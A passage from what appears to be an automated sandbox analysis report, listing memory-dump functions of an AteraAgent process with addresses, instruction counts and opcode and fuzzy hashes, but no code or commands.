                                                                                                                                                                                                                                          Function 00007FFAAB594040 Relevance: .1, Instructions: 117COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 47da13df0723a5d2413ab5e1de3e05c98629424134d5a5e4b9af783990dc1045
                                                                                                                                                                                                                                          • Instruction ID: 73efaafc320fb11f4256326facad6949cad0dfe14246afa944d44813cccf9e6b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 47da13df0723a5d2413ab5e1de3e05c98629424134d5a5e4b9af783990dc1045
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F42139B270DE8F4FEAD8E71C645527923C6EB892E1B54817AD84EC32D6DD16DC0643C0
                                                                                                                                                                                                                                          Function 00007FFAAB58F1D0 Relevance: .1, Instructions: 115COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: b8b5905c28605196443a0beb9929c6da60baca17383f07d64f5d5303d666749c
                                                                                                                                                                                                                                          • Instruction ID: e41ca0bee1b98ac0c1585906614b19ea0575a1b1ae8cee5e366d092b4d4d5a52
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b8b5905c28605196443a0beb9929c6da60baca17383f07d64f5d5303d666749c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FD31E831A1DA868FE7A0C7289444675B7D1EFA93A4F08057FD44DD22B3CB15E989C386
                                                                                                                                                                                                                                          Function 00007FFAAB59D83C Relevance: .1, Instructions: 111COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 3f090cbb863b820d4e909e98f01be65e5c2764a03382874359132e4675889b68
                                                                                                                                                                                                                                          • Instruction ID: de07726807f668113cbceb9725e46fbde1891a8cde799f7e78eeba41c949858c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3f090cbb863b820d4e909e98f01be65e5c2764a03382874359132e4675889b68
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 31318330909A8E8FEB85DF68C4556A93FE4EF1A345F04407AE44ED31A2CA299855CBD1
                                                                                                                                                                                                                                          Function 00007FFAAB5A16AE Relevance: .1, Instructions: 108COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: c944895a818cd6efd2bd657fe1e2a13da3e5af22b747c3bf0ff4dd590681c386
                                                                                                                                                                                                                                          • Instruction ID: 52954cb1c64b080a7514df308194e0e113d593134fd3ac9067fdb5576f08696a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c944895a818cd6efd2bd657fe1e2a13da3e5af22b747c3bf0ff4dd590681c386
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0C31C520B1DA998FDB95DB2D905567937C1EF99740F1041BAF48FC32A7CE28A84987C2
                                                                                                                                                                                                                                          Function 00007FFAAB596E79 Relevance: .1, Instructions: 107COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 8a6fc9cf9f5aa9acdeb6bce67291c62f038d589fc5a3a097d360fa7b63182c17
                                                                                                                                                                                                                                          • Instruction ID: 7259f74b2b3673c65b338ae8e9cd2f6212c5b49999f8f3b63e8784a79754b023
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8a6fc9cf9f5aa9acdeb6bce67291c62f038d589fc5a3a097d360fa7b63182c17
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D5313A7281CBC68FD745EB38C855665BBE0EFA6340F0445BAD08EC71A2DE24A9498782
                                                                                                                                                                                                                                          Function 00007FFAAB5881AE Relevance: .1, Instructions: 106COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 7b2851403d64652dc920e0e11a30938416272db4bb194c4c3ad4f5f1e9545403
                                                                                                                                                                                                                                          • Instruction ID: 4d38e716d55e974463e3743cd506f2bdf1a0f64c7460dc5d16f0194d5bb4b5bd
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7b2851403d64652dc920e0e11a30938416272db4bb194c4c3ad4f5f1e9545403
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B0410B70D0961D8FEB98EB64C4A57FAB6B1EF65341F5000AED00ED7292DB385985CB11
                                                                                                                                                                                                                                          Function 00007FFAAB58E938 Relevance: .1, Instructions: 104COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 62fbbec58b473b03bb024e58bb740bd356ef8b8c8ea080b7177b0eb79e8b5f0a
                                                                                                                                                                                                                                          • Instruction ID: 80272875c5bfb0fcb4b82580477a2ba482c649f7f0229318de077468d433b23d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 62fbbec58b473b03bb024e58bb740bd356ef8b8c8ea080b7177b0eb79e8b5f0a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DC31089250EBCA8FE755A73CC8155763FD5DF5778070880FAD089CB1A7D818AC0E8380
                                                                                                                                                                                                                                          Function 00007FFAAB5998D8 Relevance: .1, Instructions: 104COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 3aef997035401abf53eff63a03fb6684bd27ab73b70e3a6b043b06c254be7453
                                                                                                                                                                                                                                          • Instruction ID: 0a8a1788066fce40f86daa1beca8f464f86a26349389e26839148a47e7ba8df5
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3aef997035401abf53eff63a03fb6684bd27ab73b70e3a6b043b06c254be7453
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1931CD3150E7C68FD7578B2898A16913FF0EF07310B1A44DBC489CB0B7E6689C4AC762
                                                                                                                                                                                                                                          Function 00007FFAAB58BB05 Relevance: .1, Instructions: 102COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: d4b8c636871b4abdc1ec5c18518466ae4d98f2adff49d708aff7f15bbb69f501
                                                                                                                                                                                                                                          • Instruction ID: 936e7c5950ffedcfa78b5d4ea8f49b4aba403152c9c117255af361c7effe4dbe
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d4b8c636871b4abdc1ec5c18518466ae4d98f2adff49d708aff7f15bbb69f501
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 90314CA2E0D78A8FE744D7B8C412AFABBE5EF56380F4041B6D00DC71D3CD1918468B91
                                                                                                                                                                                                                                          Function 00007FFAAB59D048 Relevance: .1, Instructions: 102COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: c4bf5cc8ff306c9bdb14ffd30cbcf2134a9ad8a73d9014e0c8bba609f265fbeb
                                                                                                                                                                                                                                          • Instruction ID: 33c16052119d3dea190bb22dbb05eed78860dc0adc789ed333f43362ba23e465
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c4bf5cc8ff306c9bdb14ffd30cbcf2134a9ad8a73d9014e0c8bba609f265fbeb
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B8212632A19D1D8FEB94E75C9488BF83BE5FB99350F044176E40EC7292DE149C0587C1
                                                                                                                                                                                                                                          Function 00007FFAAB592B9D Relevance: .1, Instructions: 99COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: d0e5b10c56300e7db0379685c7e317550b1588893dc2f45a7b03891e2f727110
                                                                                                                                                                                                                                          • Instruction ID: de6bfe6cf5aa4a98b9f8dfe0ee4008ece8164132a9b9d32c2dbee203270078ee
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d0e5b10c56300e7db0379685c7e317550b1588893dc2f45a7b03891e2f727110
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5A217C32B1EE538AE7B9D26D78511B87FC5DF862A4B1843BBD40DC72A3D9160C8687C1
                                                                                                                                                                                                                                          Function 00007FFAAB58BE16 Relevance: .1, Instructions: 97COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 5826f4a2bce8084e2ff62db15237e2178de6617926562955aee5121ea335d014
                                                                                                                                                                                                                                          • Instruction ID: 8d276b8fd195168cd265c649515c2ccb018dd0dacc2ffec08744a10f165fb863
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5826f4a2bce8084e2ff62db15237e2178de6617926562955aee5121ea335d014
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FE218E52A0DF8B4FE795A7E854952F877E5EBAA280F0800BBC00EC71A3DC1A584B43C1
                                                                                                                                                                                                                                          Function 00007FFAAB585201 Relevance: .1, Instructions: 95COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: efbd27052eda95616237f7e63e2c5372408e97fc4f1595d8c431c76ebef14fee
                                                                                                                                                                                                                                          • Instruction ID: 41e534041d6b10c7e9e1731686d8e0da39f299781617cda0e5ad59f95f08824d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: efbd27052eda95616237f7e63e2c5372408e97fc4f1595d8c431c76ebef14fee
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 83217F71D08A5D8FDF94EF68D4556EDBBF1FF6A300F44007AD409E3292CA34A8458B81
                                                                                                                                                                                                                                          Function 00007FFAAB583AA5 Relevance: .1, Instructions: 95COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 57e8a33479da733d6403e96e892e750717235f870c0a9717d670c3f509731ccd
                                                                                                                                                                                                                                          • Instruction ID: 0a15089a3100d4685fdf71b650ece8606efe54c0db043af36563635faaf73edd
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 57e8a33479da733d6403e96e892e750717235f870c0a9717d670c3f509731ccd
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1731C5B1D09B8D9FEB81DF68C4515EE7BF1FF66340F4440A6D408D7292DA389945CB50
                                                                                                                                                                                                                                          Function 00007FFAAB599A48 Relevance: .1, Instructions: 95COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 2ebcd2ecc7d915f31224c0d6f0db386a250b7d3f8efd1493e21713ef61f72a10
                                                                                                                                                                                                                                          • Instruction ID: 0be4922e31836b47184b056d222a506b4c4c83ec7d3cfd396bc83fbae629be49
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2ebcd2ecc7d915f31224c0d6f0db386a250b7d3f8efd1493e21713ef61f72a10
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8831053050E5478FE759EB38C0858A57B95DF56320B1482FAD04E8F0E7D928A88AC7C1
                                                                                                                                                                                                                                          Function 00007FFAAB595DDD Relevance: .1, Instructions: 88COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: b12428aac65b713f0222c39f7a13de4a6d3634018336c3b9093d7d06629f66a2
                                                                                                                                                                                                                                          • Instruction ID: 9a9d7a3dd55b4e34f3eb53a5c74d347d2feb1682ae714cecf6babf24e89901b4
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b12428aac65b713f0222c39f7a13de4a6d3634018336c3b9093d7d06629f66a2
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B2113832A1DF8A0FE795D32CB45927527D1DB9A26531441FBD44EC7297DD068C474381
                                                                                                                                                                                                                                          Function 00007FFAAB582E38 Relevance: .1, Instructions: 87COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 82679b7f55928df39cd9815710f8608aec0d706d01de25b618f32ed12ce2c384
                                                                                                                                                                                                                                          • Instruction ID: 9803098da0a73396b8042a1b2830247c2971810aac61c420da9d31ea2f522db4
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 82679b7f55928df39cd9815710f8608aec0d706d01de25b618f32ed12ce2c384
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F621E96290DA8A8FEB54DFA8D8452F97FE4FF6A240F0840BAE44DC61E3DD255849C7C1
                                                                                                                                                                                                                                          Function 00007FFAAB594BE5 Relevance: .1, Instructions: 84COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 0690453af18ea79c7ca68cb2bf5e57381278f247d91e24386db578a15484c63f
                                                                                                                                                                                                                                          • Instruction ID: 6041a9ccc5fc10d577b1357e7c65c350d853953afd765d38b18f88b919190ebc
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0690453af18ea79c7ca68cb2bf5e57381278f247d91e24386db578a15484c63f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5221B73161DE8A8FD799E368C050A7577E5EF96340B0940FAD09FC72A3CE18A84AC7D1
                                                                                                                                                                                                                                          Function 00007FFAAB58425B Relevance: .1, Instructions: 84COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 91706099127c1a904441b3a9677f1c9b0051327d0d8826b060816f23da93999e
                                                                                                                                                                                                                                          • Instruction ID: 3e6c6b85f159dbf42ac1ad8341d47fcdb298f7f9afea1d0b2fd963540cd51d1c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 91706099127c1a904441b3a9677f1c9b0051327d0d8826b060816f23da93999e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AE215B3188E3C68FD3124BB068125F57F789F03295F1A41E7D48EDB4A3C52D559AC7A2
                                                                                                                                                                                                                                          Function 00007FFAAB585220 Relevance: .1, Instructions: 82COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 4bb529fc30edcd455845610055e696467e8431883d2aa403c00362b4ff53d969
                                                                                                                                                                                                                                          • Instruction ID: b550c3b9ac7637ee84e8d673280e1957e17eeba85e09438bb84cd50f808921c8
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4bb529fc30edcd455845610055e696467e8431883d2aa403c00362b4ff53d969
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 14215E71D08A5D8FDF84EF68D855AEEBBF1FF69340F40047AE409E3291CA34A9418B91
                                                                                                                                                                                                                                          Function 00007FFAAB595E30 Relevance: .1, Instructions: 79COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 37ad8e8628745808226b5e9404c8c744a47ab18eb19bd4d3bb47f667012a3227
                                                                                                                                                                                                                                          • Instruction ID: e6c584fe7a1f0a9588e2f3a237cc7541cdc0bd225e21c15a3576458732c159ac
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 37ad8e8628745808226b5e9404c8c744a47ab18eb19bd4d3bb47f667012a3227
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0D11E532B1DE0B4FABE8D61C705567963C6E7D82A5714457BD40EC3299ED16DC434384
                                                                                                                                                                                                                                          Function 00007FFAAB58ADF8 Relevance: .1, Instructions: 79COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 2bac1bff4d56d8c38a6b6e8223a99ea0516e6bec7b752c959cc278ba9658620e
                                                                                                                                                                                                                                          • Instruction ID: 7af827f65ab22d5868deea561aac6fba57e58c204ef45d3725a1478f511d0d45
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2bac1bff4d56d8c38a6b6e8223a99ea0516e6bec7b752c959cc278ba9658620e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1F113D52A18F8B8FDB99D76CD4A05F473D5FF99240B48487AD00DCB1D7ED18E8068781
                                                                                                                                                                                                                                          Function 00007FFAAB5960E1 Relevance: .1, Instructions: 78COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 6829ecd55f9ff3d8e77bb531a2193bcdc81f8a8fe0228f4b5d1a82b566847d0e
                                                                                                                                                                                                                                          • Instruction ID: a7f36a483b78583d2cac0035bb7e78e9c62ddfc7da9a606f93a2a5028cce9408
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6829ecd55f9ff3d8e77bb531a2193bcdc81f8a8fe0228f4b5d1a82b566847d0e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A211E761B1EE868FE7A583692C551743EC5DF5665074940FBD41DC32B7DD528C094382
                                                                                                                                                                                                                                          Function 00007FFAAB596100 Relevance: .1, Instructions: 77COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
